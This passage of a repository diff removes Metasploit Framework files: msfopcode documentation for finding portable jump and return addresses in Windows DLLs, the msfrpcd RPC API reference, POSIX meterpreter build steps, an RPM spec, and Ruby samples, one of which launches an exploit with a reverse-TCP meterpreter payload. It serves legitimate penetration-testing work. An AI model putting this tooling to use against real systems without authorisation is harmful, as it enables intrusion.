by the database. An opcode meta type is defined as a general
categorization of opcodes based on the action they perform, such as
jumping to a register, performing a pop/pop/ret, and so on. The meta
type helps categorize different specific types of opcodes.
$ ./msfopcode metatypes
pop/pop/ret
jmp reg
call reg
jmp [reg + offset]
call [reg + offset]
popad/ret
popaw/ret
push reg/ret
The groups command lists the opcode groups currently supported by the
database. The distinction between and opcode group and an opcode meta
type is that an opcode group associates opcodes based on the specific
action they perform, such as transitioning the instruction pointer to
the current value of a specific register, like esp.
$ ./msfopcode groups
eax => eip
ebx => eip
ecx => eip
edx => eip
edi => eip
esi => eip
ebp => eip
esp => eip
[esp + 8] => eip
[reg + offset] => eip
[esp + 0x10] => eip
[esp + 0x20] => eip
[reg] => eip
The types command lists all of the various specific opcode types
supported by the database. An opcode type is an instance of a specific
opcode or opcodes that form one logical instruction block, such as a
jmp esp. Opcode types are grouped together through the use of opcode
groups and meta types. A sampling of the output is shown below:
$ ./msfopcode types
jmp esp
call esp
push esp, ret
jmp ebp
call ebp
push ebp, ret
jmp eax
...
The platforms command lists the currently supported operating system
versions broken down by major version and service pack. At this point,
the database supports Windows NT SP3 through Windows 2003 Server SP1.
The database does not take into account hot fixes. Optionally,
platforms can be filtered by specifying the -p option with an argument
that includes a text portion of the operating system name or version
to filter. For instance, specifying -p 2000 will return only Windows
2000 versions.
$ ./msfopcode platforms
Windows NT 4.0.3.0 SP3 (IA32)
Windows NT 4.0.4.0 SP4 (IA32)
Windows NT 4.0.5.0 SP5 (IA32)
Windows NT 4.0.6.0 SP6 (IA32)
Windows 2000 5.0.0.0 SP0 (IA32)
Windows 2000 5.0.1.0 SP1 (IA32)
Windows 2000 5.0.2.0 SP2 (IA32)
Windows 2000 5.0.3.0 SP3 (IA32)
Windows 2000 5.0.4.0 SP4 (IA32)
Windows XP 5.1.0.0 SP0 (IA32)
Windows XP 5.1.1.0 SP1 (IA32)
Windows XP 5.1.2.0 SP2 (IA32)
Windows 2003 Server 5.2.0.0 SP0 (IA32)
Windows 2003 Server 5.2.1.0 SP1 (IA32)
One of the major features of the opcode database is that it indexes
detailed information about modules. For instance, the opcode database
currently contains information about imports, exports, segments, and
specific module attributes for every imported module in the database.
This makes it possible to cross reference different modules and do all
sorts of fun things. To extract information about modules, the modules
command can be used. The usage for this command is shown below:
$ ./msfopcode modules -h
Usage: msfopcode modules
OPTIONS:
-E Include module export information
-I Include module import information
-S Include module segment information
-d Display detailed output
-h Help banner
-l A comma separated list of locales to filter (Ex: English)
-m A comma separated list of module names to filter (Ex: kernel32.dll,use
r32.dll)
-p A comma separated list of operating system names to filter (Ex: 2000,X
P)
-x Dump the raw XML response
The explanation in the usage for each option is fairly self
explanatory, but the basic idea is that it's possible to search the
database for modules with the ability to filter based on file name,
locale, and operating system version. For the results that are
returned, information about the module imports, exports, segments, and
detailed information can be displayed. For example, to see all of the
versions of kernel32.dll currently indexed in the database, the
following command would be run:
$ ./msfopcode modules -m kernel32.dll
Matching Modules
================
Name Base Address Size Version Timestamp
Locale
---- ------------ ---- ------- ---------
------
kernel32.dll 0x77e70000 790528 5.0.2191.1 Tue Dec 14 17:20:09 CST 1999 French
kernel32.dll 0x77e40000 1056768 5.2.3790.1830031 Thu Mar 24 20:30:42 CST 2005 English
kernel32.dll 0x77e40000 999424 5.2.3790.3 Tue Mar 25 03:42:44 CST 2003 English
kernel32.dll 0x77f00000 385024 4.0.0.0 Fri Apr 25 15:33:31 CDT 1997 English
kernel32.dll 0x77ef0000 421888 4.0.0.0 Mon Mar 29 18:10:58 CST 1999 English
kernel32.dll 0x77f00000 385024 4.0.0.0 Sun Feb 28 17:49:07 CST 1999 English
kernel32.dll 0x77f00000 385024 4.0.0.0 Tue Jul 20 18:19:59 CDT 1999 English
kernel32.dll 0x77e80000 745472 5.0.2191.1 Wed Dec 01 01:37:24 CST 1999 English
kernel32.dll 0x77e80000 741376 5.0.2195.1600 Fri Jun 09 21:03:14 CDT 2000 English
kernel32.dll 0x77e80000 741376 5.0.2195.2778 Fri May 04 17:34:08 CDT 2001 English
kernel32.dll 0x77e80000 745472 5.0.2195.5400 Tue Jul 23 03:13:13 CDT 2002 English
kernel32.dll 0x7c4e0000 757760 5.0.2195.6688 Thu Jun 19 22:43:40 CDT 2003 English
kernel32.dll 0x77e60000 937984 5.1.2600.0 Sat Aug 18 01:33:02 CDT 2001 English
kernel32.dll 0x77e60000 942080 5.1.2600.11061 Thu Aug 29 06:40:40 CDT 2002 English
kernel32.dll 0x7c800000 999424 5.1.2600.21802 Wed Aug 04 03:56:36 CDT 2004 English
If only the versions of kernel32.dll on Windows XP running on the
English locale were of concern, the results could be limited by
specifying more limiting parameters:
$ ./msfopcode modules -m kernel32.dll -p XP -l English
Matching Modules
================
Name Base Address Size Version Timestamp
Locale
---- ------------ ---- ------- ---------
------
kernel32.dll 0x77e60000 937984 5.1.2600.0 Sat Aug 18 01:33:02 CDT 2001 English
kernel32.dll 0x77e60000 942080 5.1.2600.11061 Thu Aug 29 06:40:40 CDT 2002 English
kernel32.dll 0x7c800000 999424 5.1.2600.21802 Wed Aug 04 03:56:36 CDT 2004 English
To display detailed information about modules that match, the -d
parameter can be specified:
$ ./msfopcode modules -m kernel32.dll -p XP -l English -d
.-============================================
Name : kernel32.dll
Base Address: 0x77e60000
Size : 937984
Version : 5.1.2600.0
Timestamp : Sat Aug 18 01:33:02 CDT 2001
Locale : English
Platforms :
Windows XP 5.1.0.0 SP0 (IA32)
.-============================================
Name : kernel32.dll
Base Address: 0x77e60000
Size : 942080
Version : 5.1.2600.11061
Timestamp : Thu Aug 29 06:40:40 CDT 2002
Locale : English
Platforms :
Windows XP 5.1.1.0 SP1 (IA32)
.-============================================
Name : kernel32.dll
Base Address: 0x7c800000
Size : 999424
Version : 5.1.2600.21802
Timestamp : Wed Aug 04 03:56:36 CDT 2004
Locale : English
Platforms :
Windows XP 5.1.2.0 SP2 (IA32)
The real purpose behind the opcode database, however, is the ability
to search for specific opcodes across different operating system
versions with the ability to cross reference results in order to
determine return address portability. For that reason, the msfopcode
script provides the search command:
$ ./msfopcode search -h
Usage: msfopcode search
OPTIONS:
-M A comma separated list of opcode meta types to filter (Ex: jmp reg)
-P Results must span more than one operating system version
-a A comma separated list of addresses to filter (Ex: 0x41424344)
-g A comma separated list of opcode groups to filter (Ex: esp => eip)
-h Help banner
-l A comma separated list of locales to filter (Ex: English)
-m A comma separated list of module names to filter (Ex: kernel32.dll,user32.dll)
-p A comma separated list of operating system names to filter (Ex: 2000,XP)
-t A semi-colon separated list of opcode types to filter (Ex: jmp esp,call esp)
-x Dump the raw XML response
Like the modules command, the search command provides a way of
limiting the results that come back as a result of the search. In this
case, opcode results can be limited based on meta type, group, type,
operating system, module, locale, and even address. This makes it
possible to get fairly granular results in an intuitive manner.
Furthermore, the server can be instructed to only return results that
are portable in the event that the -P option is specified, although
there are currently some issues with this option being accurate.
To search for all occurrences of a ecx => eip opcode group in
ws2help.dll on Windows 2000 and XP, the following command could be
issued:
$ ./msfopcode search -p 2000,XP -m ws2help.dll -g "ecx => eip"
Opcodes
=======
Address Type OS
------- ---- --
0x74fa3112 call ecx Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
0x71aa1224 push ecx, ret Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
0x71aa396d call ecx Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
0x71aa3de3 call ecx Windows XP 5.1.2.0 SP2 (IA32) (ws2help.dll)
0x71aa163b push ecx, ret Windows XP 5.1.2.0 SP2 (IA32) (ws2help.dll)
0x75023112 call ecx Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
Windows 2000 5.0.3.0 SP3 (IA32) (ws2help.dll)
Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
To limit the results to portable ones only, the -P option can be
tagged on producing output like that shown below:
$ ./msfopcode search -p 2000,XP -m ws2help.dll -g "ecx => eip" -P
Opcodes
=======
Address Type OS
------- ---- --
0x74fa3112 call ecx Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
0x71aa1224 push ecx, ret Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
0x71aa396d call ecx Windows XP 5.1.0.0 SP0 (IA32) (ws2help.dll)
Windows XP 5.1.1.0 SP1 (IA32) (ws2help.dll)
0x75023112 call ecx Windows 2000 5.0.0.0 SP0 (IA32) (ws2help.dll)
Windows 2000 5.0.1.0 SP1 (IA32) (ws2help.dll)
Windows 2000 5.0.2.0 SP2 (IA32) (ws2help.dll)
Windows 2000 5.0.3.0 SP3 (IA32) (ws2help.dll)
Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
For custom development purposes, the script can also be told to dump
results in raw XML format such that extensions can be written to the
interface in the future by third parties. This can be accomplished by
specifying the -x parameter.
More information online at: http://metasploit.com/framework/

View File

@ -1,166 +0,0 @@
[ INTRODUCTION ]
The msfrpcd daemon uses the xmlrpc plugin to provide a remote
interface to the Metasploit Framework. By default, this service
listens on port 55553, uses SSL, and is password protected.
The RPC interface allows access to a minimal set of framework
APIs, covering the core framework, the module set, the job list,
and the session table. These APIs can be used to enumerate
modules, execute them, and interact with the resulting sessions
and jobs.
[ USAGE ]
To activate the RPC interface, launch msfrpcd, or load msfconsole
and load the xmlrpc plugin.
$ ./msfrpcd -P s3cr3tp4ss
- or -
msf> load xmlrpc Pass=s3cr3tp4ss
Once the interface is started, any compatible RPC interface can be used
to interact with the service. The 'msfrpc' client provides a Ruby
shell that can be used to talk to the service.
$ ./msfrpc -h server_name -P s3cr3tp4ss
[*] The 'rpc' object holds the RPC client interface
>> rpc.call("core.version")
=> {"version"=>"3.3-dev"}
[ API - AUTH ]
Method: auth.login
Expects: username, password
Returns: { "result" => "success", "token" => "<token>" }
Summary: This method is used by rpc.login() to obtain the session key
(token) which is sent in subsequent requests. This token uniquely
identifies a particular client and can be used by multiple clients,
even after the originating TCP session is closed. The RPC client
object automatically sends this token with all other method calls.
Inactive tokens are destroyed after five minutes of non-use.
[ API - CORE ]
Method: core.version
Expects: none
Returns: { "version" => "<framework-version>" }
[ API - MODULE ]
Method: module.exploits
Method: module.auxiliary
Method: module.payloads
Method. module.encoders
Method: module.nops
Expects: none
Returns: { "modules" => [ "module1", "module2", ... ] }
Summary: This method is used to obtain a list of available modules
of the specified type. The resulting module names can be used in
other calls within the module service.
Method: module.info
Expects: module_type, module_name
Returns: { "name" => "<name>", ... }
Summary: This method returns all shared module fields (name, authors,
version, description, etc), but also the list of targets and actions
when appropriate.
Method: module.options
Expects: module_type, module_name
Returns: { "<option_name>" => { "type" => "integer", ... } }
Summary: This method returns a list of all options for a given module,
including advanced and evasion options. The returned hash contains
detailed information about each option, including its type, its
default value, whether it is required, and so on.
Method: module.compatible_payloads
Expects: module_name
Returns: { "payloads" => [ "payload1", "payload2", ... ] }
Summary: This method only works for exploit modules and returns a
list of payloads that are compatible with the specified exploit.
Method: module.execute
Expects: module_type, module_name, options_hash
Returns: { "result" => "success" }
Summary: This method only works for exploit and auxiliary modules
and uses the simplified framework API to launch these modules
with the specified options. Option values should be placed into
the options_hash argument, including items such as PAYLOAD,
TARGET, ACTION, and all required options.
[ API - JOB ]
Method: job.list
Expects: none
Returns: { "<job_id>" => "<job_name>" }
Summary: This method returns a list of running jobs, along with
the name of the job.
Method: job.stop
Expects: job_id
Returns: { "result" => "success" }
Summary: This method kills a specific job by ID
[ API - SESSION ]
Method: session.list
Expects: none
Returns: { "<session_id>" => { "type" => "shell", ... } }
Summary: This method returns a list of active sessions, including
the fields type, tunnel_local, tunnel_peer, via_exploit,
via_payload, and desc.
Method: session.stop
Expects: session_id
Returns: { "result" => "success" }
Summary: This method kills a specific session by ID
Method: session.shell_read
Expects: session_id
Returns: { "data" => "<shell_data>" }
Summary: This method reads any pending output from a session. This
method only works for sessions of type "shell" and does not block.
Method: session.shell_write
Expects: session_id, shell_data
Returns: { "write_count" => "<number_of_bytes_written>" }
Summary: This method writes the specified input into the session.
This method only works for sessions of type "shell" and does not
block.
[ EXCEPTIONS ]
When an error occurs, an exception is thrown on the client side. This
exception will be of class XMLRPC::FaultException and the faultCode
and faultString methods of this exception will contain detailed
information about the problem. Many API calls will raise faultCode
of 404 when the specified item is not found. An unhandled, server
exception will result in a faultCode of 500 on the client side.
[ SECURITY CONSIDERATIONS ]
At this time, the SSL certificate used by the service is
dynamically allocated, making it vulnerable to a man-in-the-middle
attack. Future versions will address this by allowing a certificate
to be generated and verified.
The current implementation passes the username and password for the
RPC service as parameters on the command line. This can lead to
disclosure of the password to other local users on some Unix systems.
The msfrpc and msfrpcd applications change the displayed arguments
as soon as they are launched, but there is still a brief window of
time where another local user may snoop the msfrpcd password. In the
future, the password will be specified via TTY or file.

View File

@ -1,77 +0,0 @@
Steps needed to build the POSIX meterpreter from scratch
--------------------------------------------------------
1) Build bionic libc
you will need "jam" package for compiling.
# cd external/source/meterpreter/source/bionic/libc
# ARCH=x86 TOP=${PWD} jam
... lots of output ...
# cd out/x86/
# sh make.sh
.. makes dynamic library ...
you now have a libbionic.so, copy to source/bionic/compiled/libc.so
2) Build bionic libm
# cd external/source/meterpreter/source/bionic/libm
# make -f msfMakefile
... lots of output ...
you now have a libm.so, copy to source/bionic/compiled/
3) Build bionic libdl
# cd external/source/meterpreter/source/bionic/libdl
# make
copy libdl.so to source/bionic/compiled
4) Build openssl
download openssl 0.9.8o
Edit the Configure file. Locate "linux-elf line, duplicate it, s/-elf/-msf/, s/-ldl//, on the duplicate.
# ./Configure threads no-zlib no-krb5 386 --prefix=/tmp/out linux-msf no-dlfcn shared
...
# LIBC=/path/to/bionic/libc
# LIBM=/path/to/bionic/libm
# COMPILED=/path/to/bionic/compiled
# make CC="gcc -I ${LIBC}/include -I ${LIBC}/kernel/common/linux/ -I ${LIBC}/kernel/common/ -I ${LIBC}/arch-x86/include/ -I ${LIBC}/kernel/arch-x86/ -I${LIBC}/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${LIBM}/include -L${COMPILED} -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend clean all
... lots of compiling ...
# cp libssl.so ${COMPILED}
# cp libcrypto.so ${COMPILED}
5) Compile the common/support library code
# cd external/source/meterpreter/workspace/common
# make
.. copy libsupport.so to source/bionic/compiled ..
6) Build the metsrv_main binary
# cd external/source/meterpreter/workspace/metsrv
# make
You will need to generate a linker script, and set the location to 0x00040000. -Wl,-verbose >log , edit log for == ==
.. copy metsrv_main to source/bionic/compiled directory
7) Build the rtld binary (last step)
# cd external/source/meterpreter/source/server/rtld
# make test
(make test will make msflinker, which you can use to test the meterpreter)
8) Compile the ext_server_stdapi
# external/source/meterpreter/workspace/extensions/stdapi
# make
copy ext_server_stdapi.so to data/meterpreter/ext_server_stdai.lso <-- notice the .lso

View File

@ -1,87 +0,0 @@
%define name metasploit
%define version 3.2
%define release 1
%define prefix /opt
%define __spec_install_post :
BuildArch: noarch
BuildRoot: %(mktemp -ud %{_tmppath}/%{name}-%{version}-%{release}-XXXXXX)
Group: Applications/System
License: BSD
Name: %{name}
Packager: Ramon de Carvalho Valle <ramon@risesecurity.org>
Release: %{release}
Requires: ruby
Source: %{name}-%{version}.tar.gz
Summary: The Metasploit Framework
URL: http://www.metasploit.com/framework/
Version: %{version}
%description
The Metasploit Framework is a development platform for creating security tools
and exploits. The framework is used by network security professionals to
perform penetration tests, system administrators to verify patch
installations, product vendors to perform regression testing, and security
researchers world-wide. The framework is written in the Ruby programming
language and includes components written in C and assembler.
%prep
%setup -q
%install
rm -rf %{buildroot}
cd ../
mkdir -p %{buildroot}%{prefix}
cp -r %{name}-%{version} %{buildroot}%{prefix}
%clean
rm -rf %{buildroot}
%post
ln -s %{prefix}/%{name}-%{version}/msfcli /usr/local/bin
ln -s %{prefix}/%{name}-%{version}/msfconsole /usr/local/bin
ln -s %{prefix}/%{name}-%{version}/msfd /usr/local/bin
ln -s %{prefix}/%{name}-%{version}/msfelfscan /usr/local/bin
ln -s %{prefix}/%{name}-%{version}/msfencode /usr/local/bin
ln -s %{prefix}/%{name}-%{version}/msfgui /usr/local/bin
ln -s %{prefix}/%{name}-%{version}/msfmachscan /usr/local/bin
ln -s %{prefix}/%{name}-%{version}/msfopcode /usr/local/bin
ln -s %{prefix}/%{name}-%{version}/msfpayload /usr/local/bin
ln -s %{prefix}/%{name}-%{version}/msfpescan /usr/local/bin
ln -s %{prefix}/%{name}-%{version}/msfweb /usr/local/bin
%postun
rm -f %{prefix}/%{name}-%{version}/msfcli
rm -f %{prefix}/%{name}-%{version}/msfconsole
rm -f %{prefix}/%{name}-%{version}/msfd
rm -f %{prefix}/%{name}-%{version}/msfelfscan
rm -f %{prefix}/%{name}-%{version}/msfencode
rm -f %{prefix}/%{name}-%{version}/msfgui
rm -f %{prefix}/%{name}-%{version}/msfmachscan
rm -f %{prefix}/%{name}-%{version}/msfopcode
rm -f %{prefix}/%{name}-%{version}/msfpayload
rm -f %{prefix}/%{name}-%{version}/msfpescan
rm -f %{prefix}/%{name}-%{version}/msfweb
%files
%defattr(-,root,root)
%{prefix}/%{name}-%{version}
%changelog
* Sun Nov 19 2008 Ramon de Carvalho Valle <ramon@risesecurity.org> - 3.2-1
- Changed name to metasploit
- Added post and postun scripts
* Sun Nov 9 2008 Ramon de Carvalho Valle <ramon@risesecurity.org> - 3.2-1
- Initial version

View File

@ -1,34 +0,0 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates how a module's information can be easily serialized
# to a readable format.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base'
if (ARGV.empty?)
puts "Usage: #{File.basename(__FILE__)} module_name"
exit
end
modname = ARGV.shift
framework = Msf::Simple::Framework.create
begin
# Create the module instance.
mod = framework.modules.create(modname)
if not mod
puts "Error: The specified Msf::Module, \"#{modname}\", was not found."
else
# Dump the module's information in readable text format.
puts Msf::Serializer::ReadableText.dump_module(mod)
end
rescue
puts "Error: #{$!}\n\n#{$@.join("\n")}"
end

View File

@ -1,30 +0,0 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates how a file can be encoded using a framework
# encoder.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base'
if (ARGV.empty?)
puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
exit
end
framework = Msf::Simple::Framework.create
begin
# Create the encoder instance.
mod = framework.encoders.create(ARGV.shift)
puts(Msf::Simple::Buffer.transform(
mod.encode(IO.read(ARGV.shift)), ARGV.shift || 'ruby'))
rescue
puts "Error: #{$!}\n\n#{$@.join("\n")}"
end

View File

@ -1,20 +0,0 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates enumerating all of the modules in the framework and
# displays their module type and reference name.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base'
framework = Msf::Simple::Framework.create
# Enumerate each module in the framework.
framework.modules.each_module { |name, mod|
puts "#{mod.type}: #{name}"
}

View File

@ -1,52 +0,0 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This sample demonstrates using the framework core directly to launch an
# exploit. It makes use of the simplified exploit wrapper method provided by
# the Msf::Simple::Exploit mixin.
#
# $Revision$
#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base'
if (ARGV.length == 0)
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
exit
end
framework = Msf::Simple::Framework.create
exploit_name = ARGV.shift || 'test/multi/aggressive'
payload_name = ARGV.shift || 'windows/meterpreter/reverse_tcp'
input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::Stdio.new
begin
# Initialize the exploit instance
exploit = framework.exploits.create(exploit_name)
# Fire it off.
session = exploit.exploit_simple(
'Payload' => payload_name,
'OptionStr' => ARGV.join(' '),
'LocalInput' => input,
'LocalOutput' => output)
# If a session came back, try to interact with it.
if (session)
output.print_status("Session #{session.sid} created, interacting...")
output.print_line
session.init_ui(input, output)
session.interact
else
output.print_line("Exploit completed, no session was created.")
end
rescue
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
end

Some files were not shown because too many files have changed in this diff Show More